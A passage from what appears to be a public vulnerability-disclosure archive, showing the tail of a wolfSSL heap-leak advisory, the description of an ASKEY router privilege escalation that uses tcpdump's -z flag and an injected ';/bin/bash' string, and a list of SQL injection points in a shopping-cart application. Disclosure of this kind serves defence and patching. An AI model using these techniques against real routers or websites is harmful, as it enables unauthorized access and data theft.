/>- wolfSSL server is set up to use callback functions to log some allegedly<br />non-sensitive information, for example it logs the received packets (let us<br />say client hello for now) that were rejected by the server for future<br />inspection. But it does not log full handshake.<br /><br />Then the attacker can trigger at will the bug to write in the log some bytes of<br />the heap, it could theoretically fine-tune the timing to exfiltrate data of<br />interest.<br /><br />## POTENTIAL REMEDIATION<br />========================<br /><br />First, the use of `WOLFSSL_CALLBACKS` could be vehemently discouraged in<br />production. Second, the flawed logic of `tls13.c:DoTls13HandShakeMsgType`<br />exposed above should be fixed. The addition of `RECORD_HEADER_SZ` to `add`<br />should be conditionded by whether a record layer header was processed or not.<br /><br />In `internal.c:AddPacketInfo` and for a similar input message without a record<br />header, the lines below call `ssl->protoMsgCb` on a (right) shifted input<br />buffer:<br /><br />```c<br />ssl->protoMsgCb(written, version, type,<br />(const void *)(data + RECORD_HEADER_SZ),<br />(size_t)(sz - RECORD_HEADER_SZ),<br />ssl, ssl->protoMsgCtx);<br />```<br /><br />This does not trigger a buffer overflow but yields inconsistent log messages.<br /><br /></code></pre>
<pre><code># Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation<br /># Date: 07-12-2022<br /># Exploit Author: Leonardo Nicolas Servalli<br /># Vendor Homepage: www.askey.com<br /># Platform: ASKEY router devices RTF3505VW-N1<br /># Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7<br /># Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md<br /><br />#Description:<br />#----------<br /><br /># ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases these routers use default credentials).<br /><br /># The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 (used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.<br /><br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Multi-Vendor Shopping Cart 3.2.3 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br /><br />POST parameter 'val' is vulnerable to SQLI<br /><br />val=All[INJECT-HERE]&category=9%20&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=<br /><br /><br />POST parameter 'category' is vulnerable to SQLI<br /><br />val=All&category=9%20[INJECT-HERE]&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=<br /><br /><br />POST parameter 'startpage' is vulnerable to SQLI<br /><br />val=All&category=9 &startpage=0[INJECT-HERE]&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=<br /><br /><br />POST parameter 'real_price_min' is vulnerable to SQLI<br /><br />val=All&category=9 &startpage=0&real_price_min=250[INJECT-HERE]&real_price_max=34222&vendorid=0&size=&color=<br /><br /><br />POST parameter 'real_price_max' is vulnerable to SQLI<br /><br />val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222[INJECT-HERE]vendorid=0&size=&color=<br /><br /><br />POST parameter 'vendorid' is vulnerable to SQLI<br /><br />val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222&vendorid=0[INJECT-HERE]&size=&color=<br /><br /><br />[-] Done<br /></code></pre>